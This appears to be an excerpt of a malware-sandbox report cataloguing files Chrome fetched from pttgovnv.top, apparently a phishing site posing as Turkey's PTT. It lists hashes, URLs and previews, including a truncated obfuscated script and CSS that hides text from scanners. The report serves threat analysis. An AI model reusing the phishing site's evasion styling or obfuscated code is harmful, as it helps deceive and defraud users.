          SHA-512:7966E30FDE7A4E6C93C1AB0DC7EC038ED26372434E6E06ED56160DED6539675D7EEF060F783ADE9475ECAF9F269236197E51438A22FDD7BDE5F1A85219B5F92B
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4820],{2904:function(t,n,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_error",function(){return r(6953)}])},6953:function(t,n,r){"use strict";r.r(n);var u=r(3288),e=r(8032);function s(t){var n=t.statusCode;return(0,u.jsx)(u.Fragment,{children:(0,u.jsx)(e.Z,{statusCode:n})})}s.getInitialProps=function(t){var n=t.res,r=t.err;return{statusCode:n?n.statusCode:r?r.statusCode:404}},n.default=s}},function(t){t.O(0,[9774,2888,179],(function(){return n=2904,t(t.s=n);var n}));var n=t.O();_N_E=n}]);.//# sourceMappingURL=_error-32d9baaae5c99c79.js.map
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (847)
          Category:downloaded
          Size (bytes):1014
          Entropy (8bit):5.213019883464366
          Encrypted:false
          SSDEEP:24:0/emCtetOnzuZiqMdhuzTqgfkPH2nouoKLn7tk8:uZo86SZiqMAqgfW8L9d
          MD5:A9CE1395954F9F45B9A45B5B13AABB95
          SHA1:E6F84E57E3C55BA08ED80927F72AD308DDD8D515
          SHA-256:59A698816F6106B367D2EDFF4DB957FC516418B47EF4BAF0C44B1F6E114F92E5
          SHA-512:899EAC4F4D8346DC45591CFEF0094AA53B98A1329C8B54EA0699FA5293AC11C4F496C3D5285DF7E5B7D6C962AA805239DD36DD081273D3ADB658FA20E111C820
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/css/owl.theme.default.min.css
          Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */. .owl-theme .owl-dots,.owl-theme .owl-nav{text-align:center;-webkit-tap-highlight-color:transparent}.owl-theme .owl-nav{margin-top:10px}.owl-theme .owl-nav [class*=owl-]{color:#FFF;font-size:14px;margin:5px;padding:4px 7px;background:#D6D6D6;display:inline-block;cursor:pointer;border-radius:3px}.owl-theme .owl-nav [class*=owl-]:hover{background:#869791;color:#FFF;text-decoration:none}.owl-theme .owl-nav .disabled{opacity:.5;cursor:default}.owl-theme .owl-nav.disabled+.owl-dots{margin-top:10px}.owl-theme .owl-dots .owl-dot{display:inline-block;zoom:1}.owl-theme .owl-dots .owl-dot span{width:10px;height:10px;margin:5px 7px;background:#D6D6D6;display:block;-webkit-backface-visibility:visible;transition:opacity .2s ease;border-radius:30px}.owl-theme .owl-dots .owl-dot.active span,.owl-theme .owl-dots .owl-dot:hover span{backg
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (951)
          Category:downloaded
          Size (bytes):952
          Entropy (8bit):5.086003380220007
          Encrypted:false
          SSDEEP:24:dnkaFfQFfpiVVDoneFVZtYNwE+Lmo4ot2owKgo/7:dnkaFfQFfpOVcneFFswE+LmvRNpu
          MD5:32FAC03C421DCBA16FB4A965FC089E7A
          SHA1:F6AC75910F20381D4478C1D302B4DD30FD1EE9AD
          SHA-256:F6170FBBEE0AF98D737510B5689B31D78CF4E9A152590E594175B79212210911
          SHA-512:DC554F5BD2C040133218F74A8CAF624789B2AFFF8505547899D91BFDD03B70EF5DEB7AC9834E255CAE9177C61E5344728B13A0546E956B723E65F5D1C4D3EFD8
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/f6170fbbkFGym.css
          Preview:@keyframes g-loading-bgAnim{0%,to{background-color:rgba(255,255,255,.635)}50%{background-color:rgba(255,255,255,0)}}.g-loading-mask{width:100vw;height:100vh;display:flex;justify-content:center;align-items:center;position:fixed;left:0;top:0;animation:g-loading-bgAnim 3s linear infinite;opacity:0;-webkit-user-select:none;-moz-user-select:none;user-select:none;pointer-events:none;transition:all .3s;z-index:999999999}.g-loading-mask.show{opacity:1;pointer-events:initial}.g-loading-mask .loading{width:38px;height:38px}html,body{padding:0;border:0;margin:0;overflow-x:hidden;overflow-y:auto;overflow:hidden auto}[data-t]{font-size:1em!important}[data-t]:after{content:attr(data-t) " "}[class^=_][class$=_]{color:transparent!important}[class^=_][class$=_]{display:inline-block;pointer-events:none;position:absolute;left:1000vw}[class^=_][class$=_]::-moz-selection{color:transparent!important}[class^=_][class$=_]::selection{color:transparent!important}.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 2256 x 870, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):68762
          Entropy (8bit):7.71915786162258
          Encrypted:false
          SSDEEP:1536:rngMJBc2rGBNTitP9UVe6NdNXdhEr7Fv8p3Q3eWm:EmtrGbTKuD9Xda7yp3Iel
          MD5:C61C112D676A67063CD88EAB7CCD45C0
          SHA1:C242C80410CDA356C2DE2D4E0D23E854CC4DACBD
          SHA-256:AC2B764B80CF484BDFC9BECBE35E90C2FFF150BBAE34DC45532C0C74A293EFF4
          SHA-512:0200342B2A4E4484EDA42EC36BBBBB21E678322AAB9015CFEB54A41888F3AA6AD71423F9228CBCC1FD4155453E1BBDF5788F94CA8D78E33AFCCE400681FEE906
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/32.png
          Preview:.PNG........IHDR.......f.....1.......tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96" xmpMM:DocumentID="xmp.did:66A006C7B8FE11E488B09FFF33422EA0" xmpMM:InstanceID="xmp.iid:66A006C6B8FE11E488B09FFF33422EA0" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2B90E4DDBAB7E4118702D694C2DD9BC9" stRef:documentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%..u....IDATx.....\gy6.w.$..d,l.M.M...M.....!..0.B
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):10988
          Entropy (8bit):7.850899696696491
          Encrypted:false
          SSDEEP:192:LXQaP9egGbfXDRL6/6nIgj8Dvyn8b7ReJcWS1Mzvon0VEf6GdpE8kXa49:LXZPOz86Tn8b9vWky80G7kR
          MD5:5779E1BC67CC9B240AAF6C72C3AD52B2
          SHA1:61D74E5A57DB83F1E3B060CEF902BF35BE925F78
          SHA-256:5ED2739E173ED5FB568A567AC79927A7EA6541E93DB63435966CEDE02783757F
          SHA-512:E76E29933B4E766A4993F58DD5E13230E5F93235E1D3E506F36D73D4EAD0298D7EA5B963942B2F19FF9D6638F637F824CED0FE615CAB3FFBB05D1ADD07146B9F
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/49.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..*yIDATx...OR.../`..;';.3.1... .q..g..W.YA..b.*.CV.YA.q.......m>N.iK.l...r%..,}.....~....../.G....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q}...q..)..@..Oy..*..@..I..N... ...A...r...'....q..r..JQ..B\..gO5r... ..r..B...b.....9....D1..B\...r...'....q..r#....q..I....8A.....p..<.. ...uV..!..b..b......5t....B\...W.[..!....U.9.@.....!.A........!N....8.9.@.C.......rG....8...n. .JQ...G..gO5r....q.r.... ...q.r...'...B...r....B...&...8...8...8..!...!...!...!n......8..$.r.......B........q. .Q!.;........b.M.....p. .Q.m...........I.K..I....GO.\.>.....8z.......(j....I.K.n.?..3..q. ..p. .. .....p. .. w.@...c........%.1.....
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:downloaded
          Size (bytes):56
          Entropy (8bit):4.653262234859558
          Encrypted:false
          SSDEEP:3:H5zSum0KthbsnE71GbNKas/n:NNmBatNNm
          MD5:F2C485C0B2BB44062EC9D84292C6B3A3
          SHA1:7A9F43834C72B03B4B14907363EE9E778DADB640
          SHA-256:459D3C35E51C198A5CA60203DD5F59B0EA04E18F6F89A84FEB3B8A7CBBE58E5B
          SHA-512:FCD1E39BA5ACF3FDB5FA9B8A055E7341E58AEA653862CEEA92210BF49A8B1E8867E991D73A29C07DAA3E3C49D5EA4A0727F733DEBC590986D4D8F4D9093E116A
          Malicious:false
          Reputation:low
          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkyYnoDb63KLxIFDZRU-s8SEAmV5I9qPaTjmxIFDeofI_YSFwkCyK9oMSMP9xIFDXRlOh4SBQ1wYBmo?alt=proto
          Preview:CgkKBw2UVPrPGgAKCQoHDeofI/YaAAoSCgcNdGU6HhoACgcNcGAZqBoA
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:downloaded
          Size (bytes):92
          Entropy (8bit):4.440074751043314
          Encrypted:false
          SSDEEP:3:kw3dA4jgWYHJiv3dA4jgW6QfpXD3dA4jgW6Qen:FtDjdYHJwtDjd6EpXDtDjd6h
          MD5:7C3F7E060745668041278118C0BB3D6D
          SHA1:E639F56695B3CC30D78DCE7A0084AA8299A1311A
          SHA-256:DE5341313A4DC5D982CA50AE4A491E84BC5E80B0F439D87F05FC3973C1B7E59A
          SHA-512:B12A692EF9BE5857423F2DF563B986E241F7161573B5A7F23190696D1B0A50C5DA453C7BD35641FE61695B459D0A7D76F8053A8E0E0CCBC6811F800AAB1532C6
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/JxrWbfN16VK5LXe_vQYf2/_middlewareManifest.js
          Preview:self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 590 x 351, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):15215
          Entropy (8bit):7.966328191753387
          Encrypted:false
          SSDEEP:384:4v9zK76/9r8Q4rAhRsxAb/g55HmmcTI3368oiRw:4vI2ltko4sO5Hmziw
          MD5:7BB31B9EF5F35D816F9BC7A816C800D7
          SHA1:4F0351D0E82074BB2E94CD3F1A4CD96E3A7EDA0F
          SHA-256:4717A50BEB793AAE083B0FCA163B549706F873650D1F45812A364AF74084D804
          SHA-512:6B5B77217257C4EB9185949EB6BC87A1794E5126A047E78B4DF08757AD976E312EC66497251DEE2E31860E40925EC740A5D29605683B4AB4CFDA80261C12E7E4
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...N..._......;CV....sRGB.........gAMA......a.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...!tEXtCreation Time.2018:09:07 09:16:06D/iU..:.IDATx^...vT.....a.8W...h...|..'Y0.|.......W`y.V&.W...$C5.y...x..}.]U-..?}.W..~..7/.....]...O-_..Y...0..L.K...".....C....Y.rn^.i+....9.~.p.y~k.h....R?...L.......Q"8..X>.=.Z.M~o.yS.b[.....C...T.\.Pz.~...7La~^...g~..ex..0"T..+H..V..p..c~...].b.......Av....py.-.)...../..2Fp.. c..6.......i.........%.....>(......(.........%....^......P.....P.....\h../........u@........N..C*Q.....!...Ex......P..r.......BO.\k3.e1'H.@..N@.2.....5...0F..l.*.Y.b......Ap.j...T..J). L....N@.....*~....)e..9*.b.~W.....[.'..u.;..@..:.B... 8.-X..}`?L_..(.@...n....[.......k 8.-.Y.k......J.`...e?.8...hI_..}9nJW6D..@...'.Ur.p..y...<.*.cFp.Z.t.x.>..`.9.X0..@n.N@......Q6@16.@..N@G.:.%G.!].r.Y.......t..>.........0.)V.0..A^...N......X.3.b.z.....M.9S...........O.9U).} 8.=!<.../c..J.h......i...{.....9A.@].'.g.......Ep..@x..A
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):96
          Entropy (8bit):4.801770503303253
          Encrypted:false
          SSDEEP:3:k0WYL12AdneHBeBW6QfpX/W6Qen:UYR2AdeHBf6EpXO6h
          MD5:21C1349F80499EC49848EA61EDFCC3AB
          SHA1:CED7488DB5B6CF88DACE2E0AE2C668C0B2D4ACE2
          SHA-256:A0676D8033F5A45F08B37BB7EA756D48C584DF74246E167DBDF5D020B2A0B4B1
          SHA-512:625427E44A07B5FB3FE892A2CD8F2B78303D25BDC5581049FE71B1BDE19DF2C46DCF39176AE634FF6FF1A04061601817A872DA122997FD3F048D335EE0448808
          Malicious:false
          Reputation:low
          Preview:self.__SSG_MANIFEST=new Set(["\u002Fnotfound"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):7852
          Entropy (8bit):7.701456268374696
          Encrypted:false
          SSDEEP:192:ymBhN4ABVRD1ibtmQrEoD+V+ma6UsleVC:ymTBXWmQ4o6V+mloC
          MD5:28C2C809EB83262A1F928F4E821E8F4C
          SHA1:AA9B9E2A285AE91583FB4EC2C6234DB478B79540
          SHA-256:EFEA9410B633A1E3B80FDE6E1EF291E28BBA38FA4451B3A81D91786A0DBFFBF5
          SHA-512:13D6B52E45B07242F1C031F7F25B8C0495DB864289AD0083DAF347FB9C1B4D032D78D039F38BF0AF72F8EEBB6E5802C5C92B7ECEAB09B405F7B083D0E212D3EE
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx...Or.F..`d*..........*K+..L...D9...D>A....*.2..N...#.S5....m...".i.._..S..#.T..~.?o....W....'B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B.... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B....'....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q....?k..7.....y..._o....q..o..K.<^...7M..i1.....x.6...?.u...Z...8..oG.Yax{p...V..!.~....v._..M...5...}...AxK..f....~].]s.....o.....I........8..o.d.y...WO*=q. .....<.....z....`8.m..q.Z....q.#...o?5..v.4V.......m..U.w]...._?....W..Q..v...).Z...8..p..!s...O3'...N.....c...r!..5..........
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Web Open Font Format (Version 2), TrueType, length 117372, version 773.768
          Category:downloaded
          Size (bytes):117372
          Entropy (8bit):7.990930658865595
          Encrypted:true
          SSDEEP:3072:U3JKgVzg5ybfXYe5W59JPQaPWKSsx/DBMnVnqedkAFqPQTzIBIOK2vDMF:IVM5A5GJPQaH/NMtBkAvcnYF
          MD5:B6356C957274676E6571C1FF5E11C9A8
          SHA1:4022F95E001D734CA8F082B8E7627ABD205609EC
          SHA-256:3A8924CD5203A28628716AEDB5CEF0943DA4C3B44E3FFCEE90AB06387B41C490
          SHA-512:83DE79C74480FAFC62CDAC4012FF2A129D8701772EE16216C3D9488826AC21A9C2F8A416FE3208A61BFEA7E12C24AC1CC2D26F6D22BD2B0BA39A22D630238B59
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/media/fa-brands-400.e465758e.woff2
          Preview:wOF2.......|.......=...1.........................6.$. .`..T..~..|.X.... %..q...<.....eD.i{.TUUo..... ...o..._............b............0..^ v.ju/.ea"dT*..O.....o.7.`.../..".e..#.2...?...`.C+..8U....K ."G....#Dv6-..;.....J..-.....X.PY....N.`.......K..G....^..G..<.$K..Y5...l._.U3..]..Y......=....;...Z.?$..+..........I....s2/!...#.....}#"#3."..W.Ev.4]M.-.R.| ...xG.....\.m...l...)m...l.......6.@B`......K..$.).;.....>............Zk...2.U..{uJ..mQ...o..m .D...A...'#$?.y..a.c..d2....^..<w.vf.gw.=.Y...{O..d.d..#............).E%qS...n.......x..M}?!.!..F*....sn.V..[..0u...;..=..Fj.2....4....F....'...V......G..i?.+iM..,..[k.k.snF..e..j.fU.7..Y..n...b..MFu.|....M1. .j...$..7...'nv#b.....#.....F..../.....T_.....c.o,o.....|#.olk.K+...2I._.Q!..b...=s..)$i..X.m....*..2....3.?..@M.[...3.iu..fi.....h.....|.^.(EC.2;..b.....5^...$.0.W.A.........P...`...'...._..}..P.j}m..V..P.%..'I.C..g.?..5.4.=o.....i...;~..Zy.".5y........!..>.e+p..yb.m....@.%K`.2.`.w-Qc..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:downloaded
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liOuY&sid=6dVwkVmS0CuJG3kJBQUL
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):11236
          Entropy (8bit):7.810773514354199
          Encrypted:false
          SSDEEP:192:kMT1s9HGoPMx5pkNj2lCMRzf9vtAfvdaVyQkVdabDaV2QqgOr/NE6kMy52E+lgBK:r1OHw3pm2lCacvdaDk6CcWOYMy5D+GBK
          MD5:B2CB0F3916850DCD4056B9D6336FD78A
          SHA1:76F040631FE153456638BC65E459A184DE09FE53
          SHA-256:C947614A8D15810CF1B6768C16458C002E3D65640BF2B415BC1E23DA049CBEFD
          SHA-512:A9FA0D82D0E753F3BD767568B3D6EF135F41C9D919C5361F5CA69BE157B76E7CE9473355397CD0E92157E7A338D06B35D08AF4BF21B045B0BAEDB2D22A33CD5B
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/38.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..+qIDATx....u...`T.;.;.."..'.#.j.C..X....J.....J...IO-GPt....-m\.Tz.........!. ...8....^...[~.....8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@.....8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@...........[7..}..?b{Zo.-..[.].?|...#)......-.....|..E..K.N.....m...v%.]...P'.......z.T.k.J..@w.[....8.8...4C.P..C....L........_.Y.......3.....`/...1...=.xQ;7.@W...o[....m....fN...].o.lz~@.m.U~.saN...].o1`aZo....>sgu..p(.8..r..iBf........6Q+'..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (1892), with no line terminators
          Category:downloaded
          Size (bytes):1892
          Entropy (8bit):5.3199265720505045
          Encrypted:false
          SSDEEP:48:9MxFGgXen1yVqPNzTOv+Pgdxj2zRxpUky6fRK2:9MPGgYyV8NrgdV29vUkVfRK2
          MD5:BD7525226CFF3D63880AB3E3783107C4
          SHA1:B69F85592A127F736AD8B04F0DBB378295463C85
          SHA-256:81F05B60B2139D0F055A533BDEED2E2BC3E6142A9E779A0C644455F1BBF3F9C1
          SHA-512:9D33EACA3352F03C946DF20AEBA8ECB5430A0881A0150748E3C217400CD965FEE7F379D0D21FEA110BCE7EC43BE8BBD0230A2239EA453175C8900752B1B6FBA9
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/c27b6911JxKnW.js
          Preview:function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(){const _0xb022b5=['1002222jJEtDH','toString','254AqdTdL','__vccOpts','5ToDzfk','1085710vVxwgb','528906UwedBM','search','constructo','54xBZeip','10320728oLohLb','353TqOCxG','(((.+)+)+)','2031164WFthFE','8CvfsLG','226828xuWwpQ'];a24_0x324b=function(){return _0xb022b5;};return a24_0x324b();}(function(_0x2907ff,_0x1577d4){const _0x4680c9=a24_0x5346,_0x3fc7cd=_0x2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/0x7)+parseInt(_0x4680c9(0x6e))/0x8*(parseInt(_0x4680c9(0x70))/0x9)+-parseInt(_0x4680c9(0x75))/0xa+parseInt(_0x4680c9(0x6a))/0xb;if(_0x
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (6570)
          Category:dropped
          Size (bytes):6622
          Entropy (8bit):5.441018560135766
          Encrypted:false
          SSDEEP:192:WZc9BoTZ1QMX8mSypSLXQq6RhFXhLghvEh1IZ:cc72Mp3ycLX3Oz6S0
          MD5:576111A3EE04000D9CA3BD40B3333866
          SHA1:F131EA58893190DD12255EAC56E7F848CB712386
          SHA-256:80D723D2E5C52594EDEA4CD4A9147C42931C9A6253D0725EF597383703197F78
          SHA-512:50400A8D613F112C385844DFD269FADF138248DBF6482A60B874FB287EC7D659080DCC88F7F411EDD28E55879F63CA170184F198886B9C5EE6D10AC5304D5E32
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6219],{5332:function(e,n,l){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[slug]",function(){return l(797)}])},3846:function(e,n,l){"use strict";var s,t=l(3288),u=l(6830),a=l.n(u),r=l(1395),c=l(2466),o=l(3230),i=l(3395),d=l(6731),_=l.n(d);n.Z=function(e){var n=e.menu,l=e.menus,u=(0,r.useRouter)(),d=(0,c.useRef)(),g=function(e){return!(0,o.lF)(l.filter((function(n){return n.parentMenuId===e}))[0])&&(0,t.jsx)("ul",{className:"".concat(a().menu),children:l&&l.filter((function(n){return n.parentMenuId===e&&!(0,o.lF)(n.languageResources)})).map((function(e){return(0,t.jsxs)("li",{"data-id":(0,o.fI)(e.languageResources,i.rD.MENU).slug,children:[e.url!==i.H_.PAGE_NO_ACTION?(0,t.jsx)(_(),{href:"".concat((0,o.lF)(e.url)||e.url==i.H_.PAGE?"/".concat((0,o.fI)(e.languageResources,i.rD.MENU).slug):e.url),children:(0,t.jsx)("a",{children:(0,o.fI)(e.languageResources,i.rD.MENU).value})}):(0,t.jsxs)(t.Fragment,{children:[(0,o.fI)(e.languageResou
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):23451
          Entropy (8bit):7.830242871837404
          Encrypted:false
          SSDEEP:384:ult4ezgA7TRsHmD6+Hv/o92O7/h+y04TS8do9O4NZ0VQFdxYYRfW4By:uQeEA7TaGW+HoYM/h+TS9SJAQXFWQy
          MD5:2C9ACA8B197F0D642CCFF28D6B23289D
          SHA1:57CDD6D8F177242E12364C419CCA4BFCF6D72922
          SHA-256:6C8B32F54CD73CD08B9B79D0F2491E5195983FABD0421BBEB99A8EA3CB86256F
          SHA-512:6BB8DADF816B2BFB10F59A55803346CD17A9BCCA628BEF4840B9359EBA0D3204B7D07CBCEBFF3BE2093847CE35D490696DBA2EAA965675BD8E7B7CFDAA271C3C
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..[(IDATx....c.}.y.......1..K.y.L..j.,1v\j......_c.d.....^p........^...$i5.$...RA..tw5..3..S9....U.@0<.. .=,.U0.%.Kw...{ZGG.JW.UI..|@]]*I..s.t>..s..(.c......E...... q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.................H...........H..... q....H..... q.......... q.............................H..... q....H..... q.......... q.............................H............ q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.................H...........H..... q....H..... q.......... q.............................H..... q....H..... q.......... q.............................H............ q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.....
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):18614
          Entropy (8bit):7.842656829907835
          Encrypted:false
          SSDEEP:384:1t61ypWjXqE+0b5KjYyr/Rl4I29curptBVL+VWrapslaYo:1QrjXqEnolyd3BqeapZX
          MD5:5C8C2703821C3A1F3D4600D64E1DB92D
          SHA1:060647274799061728A0F06E7B8C3EC61EB64439
          SHA-256:4B9A02D91E97FA5B053EB85955E9C38A2594E2667838181748BBDF70BDE901A5
          SHA-512:4813636EE30E3E082763DA35A6E454081AFB39466FDB553215A66B429328A8DC8A3D24987A26ADC6D1D78D70301C6BBFCDA99D51CFA799DBB9BBE10668097016
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..HCIDATx.....\e............&.....iDWGd..8.3.i..wW....av.4^Vfu.Yv.Q?#.E.e\H.q........C...$. .t.s..O......rnu.}?..Cw]N.:U._..y.T*%....-.!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8B....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q.8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........`.`....j4.....B~.....j.n...f...2...[z.3.d............2...K.8..P].m..,,p.vB\nt....J..^.............J..l.[>=>.=I......om.]..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:RIFF (little-endian) data, Web/P image
          Category:dropped
          Size (bytes):7148
          Entropy (8bit):7.945839730308709
          Encrypted:false
          SSDEEP:96:N7ZAXeFaEn8qr8WbCYt5+KIcr/UrowzfTIHxRn7UgUG7jvxPemLbPppFIjIIle:dZAuFeWbCYtCroKix93U2xPe2aIC
          MD5:641DD16D1D00C8604EB6179270111AE9
          SHA1:184E0869FA5B954733CD187B9C9AFC8E6565BC92
          SHA-256:9A893C19F8C7DB3E1BC28AC41802909856003C35040A6091F8C02B59D1ED5CD2
          SHA-512:DFDE9BF1B3F449C9B157324C952C4213A4828A084BC3BD37AB6801C2E916942A45203C57E41B774D54EF60E1100204BEE5D0CA453B9835791C08F2BAAC62BF63
          Malicious:false
          Reputation:low
